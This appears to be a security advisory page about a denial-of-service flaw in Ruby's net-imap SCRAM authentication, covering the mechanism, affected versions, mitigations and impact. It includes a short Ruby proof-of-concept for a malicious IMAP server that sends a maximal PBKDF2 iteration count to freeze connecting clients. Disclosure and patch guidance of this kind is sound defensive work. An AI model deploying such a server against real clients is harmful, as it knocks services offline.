Listen to this Post
How the CVE Works
The vulnerability lies in net-imap’s SCRAM authentication mechanism. When a client attempts to authenticate with SCRAM-SHA1 or SCRAM-SHA256, a hostile IMAP server can inject an arbitrarily large PBKDF2 iteration count into the server-first-message. The client then executes an expensive OpenSSL::KDF.pbkdf2_hmac call, which is a blocking C extension. Because this function holds Ruby’s Global VM Lock (GVL) throughout its computation, the entire Ruby Virtual Machine (VM) is frozen for the duration of the call. OpenSSL caps the iteration count at a 32-bit signed integer (2³¹‑1). Depending on hardware and OpenSSL version, processing this maximum iteration count can block all Ruby threads in the process for over seven minutes. The Timeout module cannot be used to guard against this because the function is a native C extension that does not release the GVL. This attack vector is explicitly noted in RFC 7804’s “Security Considerations”. An attacker only needs to be able to send a crafted SCRAM server‑first message; no authentication or prior access is required.
DailyCVE Form
Platform: Ruby net-imap Version: 0.4.0‑0.4.23, 0.5.0‑0.5.13, 0.6.0‑0.6.3 Vulnerability :DoS via high iteration count Severity: Moderate date: 2026‑04‑24 Prediction: Patch expected 2026‑05‑01
What Undercode Say
Analytics Commands
Check net‑imap version gem list net‑imap Monitor Ruby VM load during SCRAM auth while true; do ps -o %cpu,time -p $(pgrep -f "ruby.your_script.rb"); sleep 1; done Simulate high iteration count (example using `openssl` CLI) openssl kdf -keylen 32 -kdfopt pass:test -kdfopt salt:saltsalt -kdfopt iter:2147483647 PBKDF2
Exploit Simulation (Ruby)
Malicious IMAP server snippet – sends an inflated iteration count
require 'socket'
server = TCPServer.new('localhost', 1143)
loop do
client = server.accept
client.puts " OK IMAP4 ready"
client.gets consume client's CAPABILITY command
client.puts " CAPABILITY IMAP4rev1 AUTH=SCRAM-SHA-256"
client.puts "1 OK done"
client.gets consume AUTHENTICATE command
Send SCRAM server‑first message with huge iteration count
client.puts "+ r=clientNonce,s=somesalt,i=2147483647"
Client will now block for minutes
client.close
end
Protection from this CVE
- Upgrade net‑imap to a patched version (0.4.24, 0.5.14, 0.6.4 or later).
- Specify a safe `max_iterations` in the authentication call:
imap.authenticate("SCRAM-SHA-256", username, password, max_iterations: 100_000)The default `max_iterations` is
2³¹‑1, which is unsafe. Choose a value that balances security and performance (e.g., 100,000–1,000,000). Failure to set a low threshold leaves the client vulnerable to the attack. - Avoid SCRAM mechanisms when connecting to untrusted servers, or use implicit TLS connections (port 993) instead of STARTTLS.
Impact
- Complete Ruby VM freeze – all threads (including the main thread) are blocked for the duration of the PBKDF2 computation.
- Extended downtime – a single authentication attempt can lock the process for up to several minutes (over 7 minutes observed on some hardware/OpenSSL versions).
- No timeout protection – because the vulnerable function is a C extension that holds the GVL, Ruby’s `Timeout` module cannot interrupt it.
- Ease of exploitation – an attacker only needs to send a malicious SCRAM server‑first message; no pre‑authentication or special privileges are required.
- Wide attack surface – any application that uses `net-imap` with SCRAM authentication (e.g., email clients, backup tools) is at risk when connecting to untrusted or compromised IMAP servers.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
